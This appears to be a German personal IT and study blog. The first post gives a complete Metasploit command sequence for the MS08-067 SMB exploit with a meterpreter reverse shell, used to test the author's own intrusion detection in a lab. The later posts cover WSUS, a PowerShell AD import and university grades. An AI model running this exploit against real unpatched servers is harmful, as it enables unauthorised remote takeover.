Test Intrusion Detection mit Metasploit / Kali 2.0

28. September 2015

Um die Intrusion Detection unseres Netzwerkes zu testen, habe ich ein wenig mit Kali / Metasploit herum experimentiert.

Als Ziel habe ich einen ungepatchten Windows 2003 R2 Server (deutsch) auf einem ESXi verwendet.

Als Angreifer kam ein Kali 2.0 ebenfalls auf einem ESXi zum Einsatz.

Als Exploit bietet sich hier immer der MS08_067 an, da dieser in der Regel relativ zuverlässig „zündet“.

Jedoch leider nicht auf meinem Deutschen Server – hierfür ist ggf. die dedizierte Angabe des Targets nötig.


msfconsole -q
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST Ziel.IP
set LHOST Quell.IP
set target 66
exploit

Ohne die Angabe des Target stürzt der Server Dienst am Ziel immer „nur“ ab – jedoch wird der Payload nicht ausgeführt.

Mit Show Targets kann man sich alle Möglichkeiten anzeigen lassen – wobei hier das NX oder NO NX glaube ich eine entscheidende Rolle spielt 🙂

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)

Bachelor Arbeit: Fernuni Hagen
– VWL – Prof. Wagner

28. September 2015

So nun ist auch dies geschafft – das Ergebnis der Abschlussarbeit ist im heimischen Briefkasten angekommen.

Die BA hatte als Thema:

Fiskalische Spillover-Effekte in der Europäischen Währungsunion.

und ist von Prof. Wagner mit 2,3 also gut bewertet wurden 🙂

Vielen Dank an Herrn Haase – meinen Betreuer am Lehrstuhl – für die gute Betreuung und an meinen Mentor!

Sollte jemand auch bei Prof. Wagner seine Arbeit schreiben – so kann er mich gern per Kommentar oder via Xing anschreiben.

VN:F [1.9.22_1171]
Rating: 9.5/10 (2 votes cast)

WSUS – Umgang mit ersetzten / superseded Updates

25. August 2015

Da ich es immer mal wieder Nachschlagen muss – hier ein Link:

How to identify and decline superseded updates in WSUS

  • No icon: update doesn’t supersede another one nor is it superseded by an update
  • Blue square on top: this update supersedes another update, these updates you do not want to clean…!!
  • Blue square in the middle: this update has been superseded by another update, and superseded another update as well, this is an example of an update you may want to clean (decline)
  • Blue square in the right below corner: this update has been superseded by another update, this is an example of an update you may want to clean (decline)

 

VN:F [1.9.22_1171]
Rating: 5.5/10 (2 votes cast)

Powershell – AD Gruppen aus csv Import

20. Juli 2015

Bevor ich es mal wieder vergesse:

Import-Module ActiveDirectory

import-csv c:\liste.csv | foreach {New-ADGroup -Name $_.name -Path "OU=Hallo,DC=Welt,DC=it" -SamAccountName $_.name -GroupCategory 1 -GroupScope 1}

Das CSV enthält in der ersten Zeile die Überschrift name und darunter in jeder Zeile einen Gruppennamen:

name
RG-Gruppe01
RG-Gruppe02
….

Erläuterung:
GroupCategory:
Distribution or 0
Security or 1

GroupScope:
DomainLocal or 0
Global or 1
Universal or 2

Weitere Details gibt es hier:
Microsoft Technet – New-ADGroup
Microsoft Technet – Verwenden des Cmdlet „Import-Csv“
Andi Sichel – Active Directory: Benutzer, Gruppen und OUs via Powershell

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)

Seminar: Fernuni Hagen – VWL – Prof. Wagner

15. April 2015

So – nachdem ich jetzt schon lange nix mehr geschrieben habe – hier jetzt der Erfahrungsbericht aus meinem Seminar an der FernUni.

Als erstes DER wichtigste Tipp für alle die es noch vor sich haben – schaut euch genau an WANN ihr euch zum Seminar anmelden müsst – dies ist in der Regel 1 1/2 bis 2 Semester vorher.
Das Verfahren ist dann so – das man aus einer Liste der angebotenen Seminare der verschiedenen Lehrstühle – min. drei mit absteigenden Prioritäten versieht.

Es müssen weiterhin ALLE bereits abgeschlossenen Module inkl. der Note !!UND!! die Anzahl der bestandenen Einsendeaufgaben pro Modul angegeben werden.

Nach einem – mir nicht wirklich transparenten Verfahren bekommt man dann – mit etwas Glück – einen Seminarplatz zu gelost.
Was mir als Wirtschaftsinformatiker besonders gelegen gekommen ist – an erster bis dritter Stelle hatte ich meine Seminarwünsche aus meiner Fachrichtung gewählt (Es gab auch nur drei).
An vierter und somit letzter Stelle stand – ein VWL Seminar am Lehrstuhl von Prof. Wagner.

Im Nachhinein – eine gar nicht so schlechte „Wahl“ Lies den Rest des Artikels »

VN:F [1.9.22_1171]
Rating: 6.5/10 (2 votes cast)

Klausur: Grundlagen der Wirtschaftsmathematik
und Statistik

27. Oktober 2014

Soooo die seit dem ersten Semester vor mir her geschobene Klausur ist korrigiert 🙂

Es hat mit 77 Punkten für eine 2,3 gereicht *HAPPY*

Insgesamt habe ich jetzt bei den Pflichtmodulen einen Schnitt von 2,7.

Ich hätte am Anfang des Studiums nicht gedacht, dass ich mich ein wenig drüber ärgern werde das es nicht für eine 2,3 gereicht hat ….

Aber wie immer gilt – aus den vorhandenen Mitteln (!!!!ZEIT!!!!) das Optimale versuchen herauszuholen (Note).

Immer wieder gern bemüht sei an dieser Stelle Herr Pareto 🙂

VN:F [1.9.22_1171]
Rating: 10.0/10 (1 vote cast)